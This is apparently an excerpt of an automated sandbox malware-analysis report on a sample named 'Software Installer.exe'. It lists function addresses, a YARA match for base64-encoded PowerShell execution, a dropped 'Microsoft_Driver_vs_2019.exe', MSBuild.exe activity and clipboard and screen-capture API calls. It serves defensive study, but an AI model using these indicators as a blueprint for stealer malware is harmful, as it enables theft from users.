Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043F410 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,13_2_0043F410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043FE3C GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,13_2_0043FE3C

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 7064, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D77321D2100_2_000001D77321D210
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D773219AF00_2_000001D773219AF0
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D77321BFE00_2_000001D77321BFE0
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D77506A2D70_2_000001D77506A2D7
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D7750667900_2_000001D775066790
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D776D379200_2_000001D776D37920
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D776D382600_2_000001D776D38260
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D776DB3E200_2_000001D776DB3E20
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D776DAB8700_2_000001D776DAB870
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D777A318800_2_000001D777A31880
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D777A324900_2_000001D777A32490
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D777A2FCBD0_2_000001D777A2FCBD
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D777A2F0D00_2_000001D777A2F0D0
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D777A382000_2_000001D777A38200
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D777A27A600_2_000001D777A27A60
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D777A2B2700_2_000001D777A2B270
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D777A2D4400_2_000001D777A2D440
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D777A285A00_2_000001D777A285A0
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D777A2E1800_2_000001D777A2E180
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D777A2BFE00_2_000001D777A2BFE0
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D777A38BBB0_2_000001D777A38BBB
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D777A28F100_2_000001D777A28F10
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D777A29F100_2_000001D777A29F10
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D777A337400_2_000001D777A33740
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D777A67ED00_2_000001D777A67ED0
Source: C:\Users\user\Desktop\Software Installer.exeCode function: 0_2_000001D777A685700_2_000001D777A68570
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF7C8141FF23_2_00007FF7C8141FF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF7C814362D3_2_00007FF7C814362D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF7C81436B23_2_00007FF7C81436B2
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeCode function: 11_2_00007FF7ECDD156011_2_00007FF7ECDD1560
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeCode function: 11_2_00007FF7ECDDE83011_2_00007FF7ECDDE830
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeCode function: 11_2_00007FF7ECDE21D811_2_00007FF7ECDE21D8
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeCode function: 11_2_00007FF7ECDD11C011_2_00007FF7ECDD11C0
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeCode function: 11_2_00007FF7ECDDE19411_2_00007FF7ECDDE194
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeCode function: 11_2_00007FF7ECDDA96C11_2_00007FF7ECDDA96C
Source: C:\Users\user\Microsoft_Driver_vs_2019.exeCode function: 11_2_00007FF7ECDD764011_2_00007FF7ECDD7640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0041C83313_2_0041C833
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004380C813_2_004380C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004110F913_2_004110F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0042189013_2_00421890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004378B813_2_004378B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040BA5013_2_0040BA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00412AF813_2_00412AF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0044430013_2_00444300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0042CBA013_2_0042CBA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004283A013_2_004283A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0044C3A013_2_0044C3A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0041BCC013_2_0041BCC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00447DF013_2_00447DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0042FE4013_2_0042FE40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0044CE1013_2_0044CE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00415EF913_2_00415EF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040104013_2_00401040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0041F06513_2_0041F065
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0041787013_2_00417870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0042783013_2_00427830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0044583013_2_00445830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0044983213_2_00449832
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040D94013_2_0040D940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040214013_2_00402140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0042615013_2_00426150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0045115013_2_00451150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043916013_2_00439160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0044216813_2_00442168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040B97013_2_0040B970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0045117013_2_00451170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0042490013_2_00424900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0042D92B13_2_0042D92B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0045113C13_2_0045113C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040F9C013_2_0040F9C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004139D013_2_004139D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043B9F913_2_0043B9F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0041218513_2_00412185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0044525013_2_00445250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00429A7013_2_00429A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0042020C13_2_0042020C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00426A1513_2_00426A15
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0041E21B13_2_0041E21B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004292C013_2_004292C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0044CAE013_2_0044CAE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00408A8013_2_00408A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0044B28013_2_0044B280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043129013_2_00431290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00445AA013_2_00445AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004512AC13_2_004512AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004252B013_2_004252B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00402B5013_2_00402B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0041C83313_2_0041C833
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040A32013_2_0040A320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040C32013_2_0040C320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00416B8113_2_00416B81
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0044B38013_2_0044B380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00411C5F13_2_00411C5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0042D46013_2_0042D460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043240713_2_00432407
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043F41013_2_0043F410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0042F43013_2_0042F430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043DC3113_2_0043DC31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004384C313_2_004384C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040D4D013_2_0040D4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004434DF13_2_004434DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0041DCDF13_2_0041DCDF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0044B4F013_2_0044B4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0041048313_2_00410483
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0042F48913_2_0042F489
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00424C9013_2_00424C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0044BCB613_2_0044BCB6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040954013_2_00409540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0044354013_2_00443540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043155F13_2_0043155F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040356013_2_00403560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0042556013_2_00425560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00413D0913_2_00413D09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040AD2013_2_0040AD20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043B53613_2_0043B536
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0041EDDC13_2_0041EDDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0044B58013_2_0044B580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00420D9013_2_00420D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00407DA013_2_00407DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004305B213_2_004305B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043364013_2_00433640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0044865013_2_00448650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043C61013_2_0043C610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043762713_2_00437627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0044B62213_2_0044B622
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040CE3013_2_0040CE30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040E6D013_2_0040E6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00444ED013_2_00444ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00445ED113_2_00445ED1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004326E013_2_004326E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004386EC13_2_004386EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00430E9313_2_00430E93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00410EAB13_2_00410EAB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00403F0013_2_00403F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043E70313_2_0043E703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0041AF0013_2_0041AF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040C71013_2_0040C710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043672913_2_00436729
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0042D73013_2_0042D730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00408FC013_2_00408FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0044C7D013_2_0044C7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004047E213_2_004047E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_004437A013_2_004437A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0040EFAE13_2_0040EFAE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0040B350 appears 52 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0041AEF0 appears 102 times
Source: Software Installer.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Source: Software Installer.exeBinary or memory string: OriginalFilename vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2653422218.000001D776DA1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Primitives.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2653065772.000001D775261000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Specialized.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2647654410.00000196DC880000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2654007016.000001D7775C1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.DiagnosticSource.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2654304809.000001D777801000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Http.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2652733750.000001D775080000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Text.Encoding.Extensions.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2656228625.000001D778571000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.DataContractSerialization.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Claims.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2653948791.000001D777590000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Tracing.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2649945136.000001D773320000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2652331382.000001D774FE0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Memory.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2654943566.000001D777C40000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Loader.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2654693448.000001D777A80000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Security.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655606492.000001D778150000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Reflection.Primitives.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2653300355.000001D776D31000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.NetworkInformation.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2656419896.000001D778770000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Text.RegularExpressions.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655994166.000001D778370000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.DataContractSerialization.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2649480850.000001D773211000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Principal.Windows.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2649978603.000001D773370000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Claims.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655586732.000001D778140000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Reflection.Emit.Lightweight.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655712102.000001D7781F1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Sockets.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2654918441.000001D777C20000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.NameResolution.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2654134907.000001D777650000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Http.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2652800615.000001D7750E0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Linq.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655900956.000001D7782B0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.SystemEvents.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2653520316.000001D776DF0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.ThreadPool.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2649544937.000001D773240000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Principal.Windows.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2652602234.000001D775061000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.Registry.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2656547373.000001D778871000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Text.RegularExpressions.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655816250.000001D778281000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.Primitives.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655435986.000001D7780C1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655879109.000001D7782A0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.ComponentModel.EventBasedAsync.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2649808115.000001D7732F1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.IO.FileSystem.DriveInfo.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2647371651.00000196DC751000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.ServicePoint.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2652887365.000001D775171000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Linq.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2647807829.00000196DC8F1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Console.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2652519231.000001D775040000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2653230217.000001D776CF0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Intrinsics.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2654092565.000001D777630000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Serialization.Xml.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2649882906.000001D773301000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2653499701.000001D776DE0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Overlapped.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2647673178.00000196DC890000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameReloaderPlugin.dll> vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655509664.000001D778110000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Serialization.Primitives.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2653138908.000001D775280000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Specialized.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2653187115.000001D776CC1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Serialization.Primitives.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2652246216.000001D774FA1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2654786945.000001D777B31000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Security.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2654113621.000001D777640000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.ReaderWriter.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655966920.000001D778340000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.Primitives.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2647763064.00000196DC8C0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Console.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2652976429.000001D775200000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Thread.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2649763096.000001D7732D0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.InteropServices.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000000.1392144079.00007FF6A4578000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemscordaccore.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000000.1392144079.00007FF6A4578000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameReloaderPlugin.dll> vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655229213.000001D777EC1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Cryptography.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2655566992.000001D778130000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Reflection.Emit.ILGeneration.dll@ vs Software Installer.exe
Source: Software Installer.exe, 00000000.00000002.2647868922.00000196DC920000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNETdesign.dll4 vs Software Installer.exe
